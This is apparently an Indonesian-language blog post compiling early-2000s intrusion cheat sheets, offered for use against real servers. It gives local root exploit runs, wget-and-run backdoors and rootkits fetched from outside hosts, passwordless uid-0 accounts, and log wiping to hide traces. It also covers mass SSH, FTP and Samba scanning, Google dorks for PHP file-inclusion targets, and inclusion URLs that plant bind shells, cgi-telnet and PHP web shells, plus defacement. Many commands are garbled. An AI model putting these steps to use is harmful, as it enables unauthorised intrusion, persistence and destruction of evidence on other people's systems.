Bermain-main dengan ROOT

========================================================
: MARI KITA MAINKAN ROOTNYA :
========================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0
cd /tmp ; mkdir … ; cd ….
wget http://www.geocities.com/lifron/local.tar.gz
tar -zxvf local.tar.gz
cd local
./lconfex -p
./lconfex -f
./handy.sh 0xbffff625 0xbffff5f1

GOT IT! Your magic number is : 792
Now create a dir ‘segfault.eng’ and touch a file named ‘segfault.eng’ in it.
Then exec “./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792” to get rootshell

*hint* : try play with -b if not succeed. [ n = 0..4 ]
ie : ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792 -b 1

Good Luck d0inks!

mkdir segfault.eng; touch segfault.eng/segfault.eng
./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
id
uid=0(root) gid=48(apache) groups=48(apache)
========================================================
/usr/sbin/useradd mails -g wheel -s /bin/bash -d /home/mails
echo “apache::0:0::/mails:/bin/bash” >> /etc/passwd
passwd -d mails
Changing password for user mails
Removing password for user mails
passwd: Success
login ke shell
last |grep mails
su apache
mkdir /var/tmp/” “
cd /var/tmp/” “
wget http.phaty.org/remove.c.txt ; mv remove.c.txt remove.c
gcc -o r remove.c -DGENERIC
./remove /home/mails
wget http://www.radikal.org/backdoor.tar.gz
tar xzf backdoor.tar.gz
./setup 35b4tud1n91n 7788
/usr/sbin/userdel -r mails
/usr/sbin/userdel -r apache
cd /var/tmp/” ” <== del semua tools
test shell with port 7788 and password 35b4tud1n91n
 ========================================================
[Langkah Hapus Log I]
 ========================================================
export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0 ========================================================
[Langkah Hapus Log I]
========================================================
rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r ========================================================
wget http://brutalside.host.sk/tools/term
chmod +x term
./term lonthe123
========================================================
wget http://brutalside.host.sk/tools/ftp.tgz
gunzip ftp.tgz
gzip ftp.tar
tar -zxvf ftp.tar.gz
cd ftp
./scan 163 22 10
./scan 163 22 10 163
========================================================
scan port dgn pscan.c ==> http://www.packetstormsecurity.nl
bila port:23 vurnerable bisa running exploit
wget http://phaty.org/7350854_c.txt
mv 7350854_c.txt 7350854.c
gcc -o 7350854 7350854.c
./7350854 IP
./7350854 216.89.24.213
========================================================
http://brutalside.host.sk/tools/kik
chmod +x kik
./kik “-bash” ./psybnc
========================================================

========================================================
find / -name wtmp -print
find / -name utmp -print
find / -name lastlog -print
whereis wtmp
whereis utmp
whereis lastlog
========================================================
/usr/sbin/useradd -d /home/apache -s /bin/ksh apache
passwd apache
Terus konek ke shell dengan user biasa,masuk ke cd /tmp dan
wget http://www.norifumiya.org/r.c
gcc -o sh r.c
rm -rf r.v
rm -rf r.c
chown 0:0 /tmp/sh
chmod 777 sh
Sampai disini kita selesai dengan permainan di server target root
Sekarang kita kembali ke user dan ketik :
./sh
nah, apa yg terjadi setelah kita jalankan command ./sh…?
yg terjadi adalah uid dan gid kita adalah 0 šŸ™‚
========================================================
wget http://www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
tar -zxvf psyBNC2.2.1-linux-i86-static.tar.gz
cd psybnc
echo “PSYBNC.SYSTEM.PORT1=60000” >> psybnc.conf
echo “PSYBNC.SYSTEM.HOST1=*” >> psybnc.conf
echo “PSYBNC.HOSTALLOWS.ENTRY0=*;*” >> psybnc.conf
./psybnc psybnc.conf
========================================================
wget http://www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ; tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log
mv psybnc “syslogd “
echo “PSYBNC.SYSTEM.PORT1=60000” >> psybnc.conf
echo “PSYBNC.SYSTEM.HOST1=*” >> psybnc.conf
echo “PSYBNC.HOSTALLOWS.ENTRY0=*;*” >> psybnc.conf
mv psybnc.conf ” ” ; pwd
PATH=$PATH:/var/tmp/” “/.log/
“syslogd ” ” “
mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud
========================================================
+Command Mapache2x
– ./mapache RangeIP (mis: ./mapachhe 200 443 10 10) << Scan
– ./apache IPTarget (Mis: ./apachee 202.11159.67.176)
 ========================================================
+Command MassApache
– ./massossl RangeIP (mis: ./masssossl 22200 443 10 10) << Scan
– ./osslx -a 0x0b -v IPTarget (Miis: ./ooosslx -a 0x0b -v 202.159.67.176)
 ========================================================
+FTP Command 4 RooT

– ./scan No Depan IP Target (Mis: ./scannn 210 21 10)

=addUser=
uid=0(root) gid=0(root) groups=50(ftp)
Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow

adduser? ketik /usr/sbin/adduser kuntua -g wheel -s /bin/bash -d /home/kuntua enter,
buat password ketik passwd kuntua enter ,
abis itu ketik tondano tekan enter abis itu ketik lagi tondano , nb: ketik tondano dua kali itu kegunaan nya buat password kita

Changing password for user ganjen
passwd: all authentication tokens updated successfully

berarti kita udah dapet user di shell tersebut, jadi tinggal login aja, jangan lupa catet ip nyah..

kalo mau dapet acces root ketik :

/usr/sbin/useradd bash -u 0 -d /

abis itu ketik lagi

passwd -d bash

apus jejak
cd /
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog

udah di ketik semua ? udahh… tekan ctrl d . ========================================================
+Backdoor
NEWCOMER FREZZ BackDooR
– wget manadocarding.info/charles; chmod 755 charles; ./charles
= wget http://www.geocities.com/lifron/root; chmod 755 root; ./root
– wget http://www.geocities.com/cak_mus/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua 7000
= wget http://www.geocities.com/lifron/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua75 7000

***** ADD USER SHELL *****
/usr/sbin/useradd yrfon -g wheel -s /bin/bash -d /etc/.yrfon
passwd -d yrfon

—————–
Patch Your Root
—————–
wget http://www.geocities.com/lifron/patch.tar.gz
tar -zxvf patch.tar.gz
cd patch
./sexy

BERSIH JEJAK:manual
echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
==================================
LOCAL ROOT
http://www.geocities.com/lifron/local.tar.gz

2.wget http://kelik-pelipur-lara.org/tools/local.tar.gz
cd local
chmod 755 *
./local.sh
./lconfex -p
./lconfex -f
sh ./handy.sh 0xbffffb24 0xbffff661

——————-
Add user dlm Root:
——————-
1.
/usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/.kuntua
passwd -d kuntua

/usr/sbin/useradd moes -g wheel -s /bin/bash -d /etc/.moes
passwd -d moes

/usr/sbin/useradd cakmoes -g wheel -s /bin/bash -d /etc/.cakmoes
passwd -d cakmoes

2.
/usr/sbin/adduser jabriks -g root -d /var/jabriks
passwd -d jabriks

/usr/sbin/adduser mus -g root -d /var/mus
passwd -d mus

/usr/sbin/useradd tondano -g wheel -s /bin/bash -d /home/.tondano
passwd tondano75
—————————-
**add user accses root
—————————-
/usr/sbin/useradd bash -g root -u 0 -d /
passwd -d tondano

/usr/sbin/useradd jabrik -g root -u 0 -d /
passwd -d jabrik

/usr/sbin/useradd cakmoes -g root -u 0 -d /
passwd -d cakmoes
———–
Del User
———–
/usr/sbin/userdel -r [namauser]
PENTING
kalo so dapa ROOT
ketik id
uname -a
abis itu
ketik cd /tmp
—————–
———————————————
ngeROOT ssh LINUX port 22:

wget http://packetstormsecurity.org/groups/teso/grabbb-0.1.0.tar.gz
tar -zxvf grabbb-0.1.0.tar.gz.tar.gz
gcc -o grabbb grabbb.c
cd grabbb
./grabbb -a IP -b IP port co:./grabbb -a 202.1.1.1 -b 202.1.1.1 22
66.201.243.210

———————————————
wget http://www.suckmyass.org/ssh-scan8.tar.gz
tar
cd ssh-scan8
./r00t 203.20 -d 4 <— scan massal SSH
./r00t 203.20 -d 2 <— scan massal FTP
./r00t 203.20 -d 3 <— scan massal FTP

./r00t 134.7. -d 4
———————————————
ngeROOT utk OS SCO :
wget http://www.renjana.com/sco
./sco IP

———————————————

pasang BackDoor:
1.

id
uname -a
cd /tmp
wget http://packetstormsecurity.org/UNIX/penetration/rootkits/tk.tgz
ls -al
tar -zxvf tk.tgz
cd tk
./t0rn kuntua 7000

———————————————
LINKS:
http://www.eviltime.com/download/exploit
http://www.cahcepu.net
http://www.vibrasi.net
http://www.paktani.tk
http://www.sisilainrevolt.org
http://www.sitiung.com
http://www.utay-doyan.cc
http://www.atstake.com/research/redirect.html?users/10pht/nc110.tgz
=======
Usage: ./sambal [-bBcCdfprsStv] [host]

-b bruteforce (0 = Liinux, 111 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B bruteforce steps ((defaulllt = 300)
-c connectback ip adddress
-C max childs for scaan/bruttteforce mode (default = 40)
-d bruteforce/scanmodde delaaay in micro seconds (default = 100000)
-f force
-p port to attack (deefault = 139)
-r return address
-s scan mode (random))
-S scan mode
-t presets (0 for a llist)
-v verbose mode
CONTOH:
[esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
————————————————————–
+ Scan mode.
+ [192.168.0.3] Samba
+ [192.168.0.10] Windows
+ [192.168.0.35] Windows
+ [192.168.0.36] Windows
+ [192.168.0.37] Windows

+ [192.168.0.133] Samba

./sambal -b 0 -v

===========
Usage: ./mayday-linux -t [-pa]
-t target The host to attackk.
-a password Default password iis “chaaangeme”.
-p port Default port is 80001.
================
/usr/sbin/adduser httpd
passwd httpd

============
PACTH SAMBA
= root@redeye samba]# /etc/init.d/smb stop
= Shutting down SMB services: [ OK ]
= Shutting down NMB services: [ OK ]
= [root@redeye root]# cd /etc/samba
= [root@redeye samba]# wget http://master.samba.org/samba/ftp/patches/patch-2.2.8-2.2.8a.diffs.gz
= [root@redeye samba]# gunzip patch-2.2.8-2.2.8a.diffs.gz
= [root@redeye samba]# patch -p1 < patch-2.2.8-2.2.8a.diffs
= [root@redeye samba]# /etc/init.d/smb start
=======================
=======
VHOST

= edit di httpd.conf
= tinggal tambah no
= kong di named.conf
= 1. wget http://apache.towardex.com/httpd/apache_1.3.27.tar.gz
= 2. tar zxvf apache_1.3.27.tar.gz
= 3. cd apache_1.3.27
= 4. ./configure
= 5. make
= 6. make install
= 7. /usr/local/apache/bin/apachectl start
= cd /usr/local/apache/conf/httpd.conf
= contoh
= echo “” > httpd.conf
= echo “ServerName http://www.Cmaster4.net&#8221; > httpd.conf
= echo “DocumentRoot /home/iptek/public_html” > httpd.conf
= echo “ScriptAlias /cgi-bin /www/Cmaster4.net/cgi-bin” > httpd.conf
= echo “” >> httpd.conf
= ——————————
= ——————————
= ——————————
= find |grep name.conf
= echo “zone “i-am.Cmaster4.net” IN {” > named.conf
= echo “type master; > named.conf
= echo “file “/var/named/named.local”;” > named.conf
= echo “allow-update { none; };” > named.conf
= echo “};” >> named.conf
= nah setelah itu kamu restart named dan httpd nya
= /etc/init.d/named stop
= /etc/init.d/named start
= /etc/init.d/httpd stop
= /etc/init.d/httpd start
= atau
= /etc/rc.d/init.d/named stop
= /etc/rc.d/init.d/named start
= /etc/rc.d/init.d/httpd stop
= /etc/rc.d/init.d/httpd start
= atau kalau bukan di /etc/init.d/ coba ketik find |grep named dan berikutnya find |grep httpd
=================================================================
wget http://www.geocities.com/lifron/Pre-psyBNC.tgz; tar -zxvf Pre-psyBNC.tgz; cd psybnc; make; wget http://www.geocities.com/lifron/psybnc.conf.6669.txt; mv psybnc.conf.6669.txt .sh; wget http://www.geocities.com/lifron/kik; chmod +x kik; ./kik “/usr/sbin/httpd -DHAVE_PROXY -DHAVE” ./psybnc .sh; cd ..; rm -rf Pre-psyBNC.tgz
====================
EGGDROP
====================
= wget http://www.geocities.com/lifron/eggdrop.tar.gz; tar -zxvf eggdrop.tar.gz; cd eggdrop; wget http://www.geocities.com/lifron/bot.conf; cd scripts; wget http://www.geocities.com/lifron/netgate.tcl; cd ..
= ./eggdrop -mnt bot.conf
./eggdrop -m bot.conf
==============
My_eGallery from K-159
==============
1.pasangin bindtty
2. kalo ggk jalan bindtty nya pasangin shell.php
3.kalo ggk jalan juga coba cgi-telnet
contohnya
http://livron.port5.com/mail.php <———ini source shell
misalnya:
http://www.moonshade.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=wget%20http://livron.port5.com/mail.php
kalo gak bisa kita cari folder yg bisa buat id wwrun utk wget
kalo bisa… buka:
http://www.target.org/modules/My_eGallery/public/mail.php
========
pasang bindtty
wget http://www.geocities.com/lifron/bindtty -O /tmp/httpd ini biar hasil wgetnya di taro di folder /tmp dg nama file httpd
baru bikin file exekusi
chmod 755 /tmp/httpd
============
cgi-telnet
mencari folder cgi-binnya >> disitulah kita Taro cgi-telnetnya
biasanya folder cgi-bin ada di folder …/www
tp kebanyakan webserver
tiap user di beri folder cgi-bin masing2
contoh:
/home/users/russisk/html/modules/My_eGallery/public <——td kan kita ada di folder ini
http://www.russisk.org/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=ls%20-al%20/home/users/russisk
kliatan cgi-bin-nya
cd ke folder cgi-bin baru wget ke situ
Contoh:
wget http://livron.port5.com/kuntua.pl -O /home/users/russisk/cgi-bin/cgi.pl
kalo bisa lanjut ke
chmod 755 /home/users/russisk/cgi-bin/cgi.pl <——-agar file cgi.pl nya jd file eksekusi
kalo bisa tinggal buka:
http://www.target.org/cgi-bin/cgi.pl port 7788
============ end
wget http://www.geocities.com/lifron/psy.tar.gz;
tar -zvxf psy.tar.gz
cd .psy
./config KuNTuA 6669
./fuck
./run
===========
Tittle : SUPER KIDDIES HACKING: “PHP SUPER BUGS”
Author : K-159
Greetz : Lieur-Euy, Red_Face, Itsme-, yudhax, pe_es, bithedz, KuNtuA, Baylaw, Minangcrew,
Chanel : #bandunghacker, #indohackinglink, #hackercrew, #batamhacker, #aikmel
Email : eufrato@linuxmail.org
Reference : security-corporations.com, security-focus.com, bugs-traq, google.com
———————————————————————————–
Prolog : i wrote this tutorial just for my dearest brother “Lieur-Euy” thx for all the best friendship, spirit, motivation, kindness, joke, and all the time that we spend together. just wait, till i finished my homework. ‘n we will rock the world again šŸ™‚

1. allinurl filename
bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?filename=*”.
keyword ‘*.php’ bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?filename=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

2. allinurl content
bugs content ini targetnya dapat kita cari dengan keyword “allinurl:*.php?content=”.
keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?content=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

3. allinurl page
bugs page ini targetnya dapat kita cari dengan keyword “allinurl:*.php?page=*”.
‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?page=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

4. allinurl link
bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?link=*”.
keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?link=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

5.allinurl file
bugs file ini targetnya dapat kita cari dengan keyword “allinurl:*.php?file=*”.
‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?file=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

Setelah mendapatkan target yang vulnerable ada beberapa hal yang bisa kita lakukan :
I. install bindtty telnet
1.buat url seperti ini:
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/bind1 -O /tmp/httpd “
url diatas untuk melakukan wget bindtty telnet ke server target dan hasil wget nya di taruh di folder /tmp dg nama file httpd.
2.lalu ubah file httpd yg berada di folder /tmp tadi jadi file eksekusi:
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /tmp/httpd “
3.eksekusi file httpd tadi :
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=/tmp/httpd
4. buka telnet ke IP target sesuai dg port bindttynya

II. install Cgi-telnet
1.buat url seperti ini :
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/pees.pl -O /var/www/cgi-bin/test.pl “
url diatas untuk melakukan wget cgi-telnet test.pl ke server target dan hasil wget disimpan di folder /var/www/cgi-bin dg nama file test.pl. sesuaikan dengan letak folder cgi-bin didalam server tersebut untuk menyimpan hasil wget cgi-telnetnya.
2. buat cgi-telnet test.pl jadi file eksekusi :
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /var/www/cgi-bin/test.pl “
3. akses cgitelnet kita dengan membuka url :
http://www.target.com/cgi-bin/test.pl
masukkan passwordnya “n0fr13”

III. install shell php
1. buat url seperti ini :
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://emilroni.port5.com/mail.php -O log.php “
url diatas utk melakukan wget ke server target dan hasil wget berupa file log.php. bila keluar pesan “permission denied” cari lah folder lain yang bisa untuk wget shell.php kita.
2. akses shell php kita sesuai dengan foldernya :
http://www.target.com/target/log.php

IV. Deface
http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=echo “K-159 and crew was touch your system” > test.html

thats all my friends. just try it !!!
Denpasar, 15 january 2004

K-159

Epilog :special thx to my beloved sister “May” for all the spirit, motivations, love, kindness, and all the fire that u give to me.”I love U my dear sister, in the name of Allah”.

bacaan lebih lanjut:
——————–
http://www.geocities.com/emilroni/hackurl.txt
http://www.geocities.com/emilroni/google.txt
==================================================================
Title :SUPER KIDDIES HACKING “Super Bugs PHP II”
Author :K-159
Greetz :KuNTuA, Lieur-Euy, pe_es.
Reference :google.com, membres.lycos.fr, security-corporations.com, security-challenge.com
==================================================================

Proof of Concept :
==================
kesalahan url pada fopen ( ) function sehingga attacker bisa menginjeksikan script ke server target.

Target :
========
Temukan target nya di google dengan keyword:
1.allinurl:*.php?page=*
2.allinurl:*.php?content=*
3.allinurl:*.php?file=*
4.allinurl:*.php?filename=*
5.allinurl:*.php?link=*
6.allinurl:*.php?view=*
7.allinurl:*.php?sec=*
8.allinurl:*.php?document=*
9.allinurl:*.php?p=*
10.allinurl:*.php?x=*

Exploit:
=========
1.http://www.target.com/target.php?page=http://www.geocities.com/inul_asoy/page.txt
2.http://www.target.com/target.php?content=http://www.geocities.com/inul_asoy/content.txt
3.http://www.target.com/target.php?file=http://www.geocities.com/inul_asoy/file.txt
4.http://www.target.com/target.php?filename=http://www.geocities.com/inul_asoy/filename.txt
5.http://www.target.com/target.php?link=http://www.geocities.com/inul_asoy/link.txt
6.http://www.target.com/target.php?view=http://www.geocities.com/inul_asoy/view.txt
7.http://www.target.com/target.php?sec=http://www.geocities.com/inul_asoy/sec.txt
8.http://www.target.com/target.php?documet=http://www.geocities.com/inul_asoy/_document_._txt
9.http://www.target.com/target.php?p=http://www.geocities.com/inul_asoy/p.txt
10.http://www.target.com/target.php?x=http://www.geocities.com/inul_asoy/x.txt

Details Exploit:
===============
Upload a file : upload file ke server target
Explore with fopen() function : mencari target yang mengandung fopen pada server target
Execute arbitrary PHP functions : membuat script php ke dalam server target
Execute a system() command : menjalankan command unix/linux di server target
Manager for SQL Server : mengubah settingan data base sql server target
System overviewer (get the root !) : mengintip system server target dan melakukan lokal root

Denpasar, 28 February 2004

K-159

bacaan lebih lanjut :
=====================
http://www.hackinthebox.org/article.php?sid=6899

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s